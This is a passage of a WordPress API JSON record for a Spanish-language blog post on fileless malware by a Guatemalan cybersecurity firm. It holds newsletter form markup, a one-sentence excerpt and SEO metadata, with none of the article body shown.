data-elementor-type=\"wp-post\" key=\"2\" data-elementor-id=\"4617\" className=\"elementor elementor-4617\">\n\t\t\t\t<div className=\"elementor-element elementor-element-46a3f1bf e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"46a3f1bf\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div className=\"elementor-element elementor-element-65b14f34 e-con-full e-grid wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"65b14f34\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div className=\"elementor-element elementor-element-752b6f44 elementor-widget elementor-widget-mf-email\" data-id=\"752b6f44\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;mf_input_name&quot;:&quot;mf-email&quot;}\" data-widget_type=\"mf-email.default\">\n\t\t\t\t<div className=\"elementor-widget-container\">\n\t\t\t\t\t\r\n\t\t<div className=\"mf-input-wrapper\">\r\n\t\t\t\r\n\t\t\t<input \r\n\t\t\t\ttype=\"email\" \r\n\t\t\t\t \r\n\t\t\t\tdefaultValue=\"\" \r\n\t\t\t\tclassName=\"mf-input mf-conditional-input\" \r\n\t\t\t\tid=\"mf-input-email-752b6f44\" \r\n\t\t\t\tname=\"mf-email\" \r\n\t\t\t\tplaceholder=\"${ parent.decodeEntities(`Ingresa tu email`) } \" \r\n\t\t\t\t \r\n\t\t\t\tonBlur=${parent.handleChange} onFocus=${parent.handleChange} aria-invalid=${validation.errors['mf-email'] ? 'true' : 'false' } \r\n\t\t\t\tref=${el=> parent.activateValidation({\"message\":\"This field is required.\",\"emailMessage\":\"Please enter a valid Email address\",\"minLength\":1,\"maxLength\":\"\",\"type\":\"none\",\"required\":true,\"expression\":\"null\"}, el)}\r\n\t\t\t\t\t\t\t\/>\r\n\r\n\t\t\t\t\t\t<${validation.ErrorMessage} \r\n\t\t\t\terrors=${validation.errors} \r\n\t\t\t\tname=\"mf-email\" \r\n\t\t\t\tas=${html`<span className=\"mf-error-message\"><\/span>`}\r\n\t\t\t\/>\r\n\t\t\t\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div className=\"elementor-element elementor-element-54379b03 elementor-widget__width-auto elementor-widget elementor-widget-mf-button\" data-id=\"54379b03\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"mf-button.default\">\n\t\t\t\t<div className=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div className=\"mf-btn-wraper mf-conditional-input\" data-mf-form-conditional-logic-requirement=\"\">\r\n\t\t\t\t\t\t\t<button type=\"submit\" className=\"metform-btn metform-submit-btn \" id=\"\">\r\n\t\t\t\t\t<span>${ parent.decodeEntities(`Suscr\u00edbete`) } <\/span>\r\n\t\t\t\t<\/button>\r\n\t\t\t        <\/div>\r\n        \t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t`}\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t${is_dummy_markup ? message_position === 'bottom' ? props.ResponseDummyMarkup(message_successIcon, message_proClass) : '' : ''}\r\n\t\t\t\t\t${is_dummy_markup ? ' ' : message_position === 'bottom' ? props.SubmitResponseMarkup`${parent}${state}${message_successIcon}${message_errorIcon}${message_proClass}` : ''}\r\n\t\t\t\t\r\n\t\t\t\t<\/form>\r\n\t\t\t`\r\n\t\t<\/script>\r\n\r\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>En un entorno donde los ciberdelincuentes evolucionan constantemente, los ataques fileless o malware sin archivos se han convertido en una de las amenazas m\u00e1s sofisticadas<\/p>\n","protected":false},"author":1,"featured_media":5058,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"postBodyCss":"","postBodyMargin":[],"postBodyPadding":[],"postBodyBackground":{"backgroundType":"classic","gradient":""},"footnotes":""},"categories":[15],"tags":[],"class_list":["post-5053","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerabilities"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fileless Attacks - Scube<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fileless Attacks - Scube\" \/>\n<meta property=\"og:description\" content=\"En un entorno donde los ciberdelincuentes evolucionan constantemente, los ataques fileless o malware sin archivos se han convertido en una de las amenazas m\u00e1s sofisticadas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/\" \/>\n<meta property=\"og:site_name\" content=\"Scube\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-27T00:55:49+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-27T17:27:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#\\\/schema\\\/person\\\/add6059d3acc70a37cbf9897c3fad89e\"},\"headline\":\"Fileless Attacks\",\"datePublished\":\"2026-02-27T00:55:49+00:00\",\"dateModified\":\"2026-02-27T17:27:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/\"},\"wordCount\":702,\"publisher\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/FILELESS.webp\",\"articleSection\":[\"Vulnerabilities\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/\",\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/\",\"name\":\"Fileless Attacks - Scube\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/FILELESS.webp\",\"datePublished\":\"2026-02-27T00:55:49+00:00\",\"dateModified\":\"2026-02-27T17:27:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/FILELESS.webp\",\"contentUrl\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/FILELESS.webp\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/2026\\\/02\\\/26\\\/fileless-attacks-scube\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.scube.com.gt\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Fileless Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#website\",\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/\",\"name\":\"Scube - Empresa de Ciberseguridad en Guatemala\",\"description\":\"Cybersecurity company in Guatemala\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.scube.com.gt\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#organization\",\"name\":\"Scube, S.A.\",\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/Scube-Logo-06.png\",\"contentUrl\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/Scube-Logo-06.png\",\"width\":746,\"height\":313,\"caption\":\"Scube, S.A.\"},\"image\":{\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.linkedin.com\\\/company\\\/scube-s-a\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/#\\\/schema\\\/person\\\/add6059d3acc70a37cbf9897c3fad89e\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/litespeed\\\/avatar\\\/7f69942304f804ecbfba884c96dcdab5.jpg?ver=1778592380\",\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/litespeed\\\/avatar\\\/7f69942304f804ecbfba884c96dcdab5.jpg?ver=1778592380\",\"contentUrl\":\"https:\\\/\\\/www.scube.com.gt\\\/wp-content\\\/litespeed\\\/avatar\\\/7f69942304f804ecbfba884c96dcdab5.jpg?ver=1778592380\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/scube.com.gt\\\/wordpress-scube\"],\"url\":\"https:\\\/\\\/www.scube.com.gt\\\/index.php\\\/author\\\/scube_o1rjm7ip\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fileless Attacks - Scube","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/","og_locale":"es_ES","og_type":"article","og_title":"Fileless Attacks - Scube","og_description":"En un entorno donde los ciberdelincuentes evolucionan constantemente, los ataques fileless o malware sin archivos se han convertido en una de las amenazas m\u00e1s sofisticadas","og_url":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/","og_site_name":"Scube","article_published_time":"2026-02-27T00:55:49+00:00","article_modified_time":"2026-02-27T17:27:02+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp","type":"image\/webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#article","isPartOf":{"@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/"},"author":{"name":"admin","@id":"https:\/\/www.scube.com.gt\/#\/schema\/person\/add6059d3acc70a37cbf9897c3fad89e"},"headline":"Fileless Attacks","datePublished":"2026-02-27T00:55:49+00:00","dateModified":"2026-02-27T17:27:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/"},"wordCount":702,"publisher":{"@id":"https:\/\/www.scube.com.gt\/#organization"},"image":{"@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#primaryimage"},"thumbnailUrl":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp","articleSection":["Vulnerabilities"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/","url":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/","name":"Fileless Attacks - Scube","isPartOf":{"@id":"https:\/\/www.scube.com.gt\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#primaryimage"},"image":{"@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#primaryimage"},"thumbnailUrl":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp","datePublished":"2026-02-27T00:55:49+00:00","dateModified":"2026-02-27T17:27:02+00:00","breadcrumb":{"@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#primaryimage","url":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp","contentUrl":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2026\/02\/FILELESS.webp","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/www.scube.com.gt\/index.php\/2026\/02\/26\/fileless-attacks-scube\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.scube.com.gt\/"},{"@type":"ListItem","position":2,"name":"Fileless Attacks"}]},{"@type":"WebSite","@id":"https:\/\/www.scube.com.gt\/#website","url":"https:\/\/www.scube.com.gt\/","name":"Scube - Empresa de Ciberseguridad en Guatemala","description":"Cybersecurity company in Guatemala","publisher":{"@id":"https:\/\/www.scube.com.gt\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.scube.com.gt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.scube.com.gt\/#organization","name":"Scube, S.A.","url":"https:\/\/www.scube.com.gt\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.scube.com.gt\/#\/schema\/logo\/image\/","url":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2025\/07\/Scube-Logo-06.png","contentUrl":"https:\/\/www.scube.com.gt\/wp-content\/uploads\/2025\/07\/Scube-Logo-06.png","width":746,"height":313,"caption":"Scube, S.A."},"image":{"@id":"https:\/\/www.scube.com.gt\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/company\/scube-s-a\/"]},{"@type":"Person","@id":"https:\/\/www.scube.com.gt\/#\/schema\/person\/add6059d3acc70a37cbf9897c3fad89e","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.scube.com.gt\/wp-content\/litespeed\/avatar\/7f69942304f804ecbfba884c96dcdab5.jpg?ver=1778592380","url":"https:\/\/www.scube.com.gt\/wp-content\/litespeed\/avatar\/7f69942304f804ecbfba884c96dcdab5.jpg?ver=1778592380","contentUrl":"https:\/\/www.scube.com.gt\/wp-content\/litespeed\/avatar\/7f69942304f804ecbfba884c96dcdab5.jpg?ver=1778592380","caption":"admin"},"sameAs":["https:\/\/scube.com.gt\/wordpress-scube"],"url":"https:\/\/www.scube.com.gt\/index.php\/author\/scube_o1rjm7ip\/"}]}},"_links":{"self":[{"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/posts\/5053","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/comments?post=5053"}],"version-history":[{"count":25,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/posts\/5053\/revisions"}],"predecessor-version":[{"id":5084,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/posts\/5053\/revisions\/5084"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/media\/5058"}],"wp:attachment":[{"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/media?parent=5053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/categories?post=5053"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scube.com.gt\/index.php\/wp-json\/wp\/v2\/tags?post=5053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}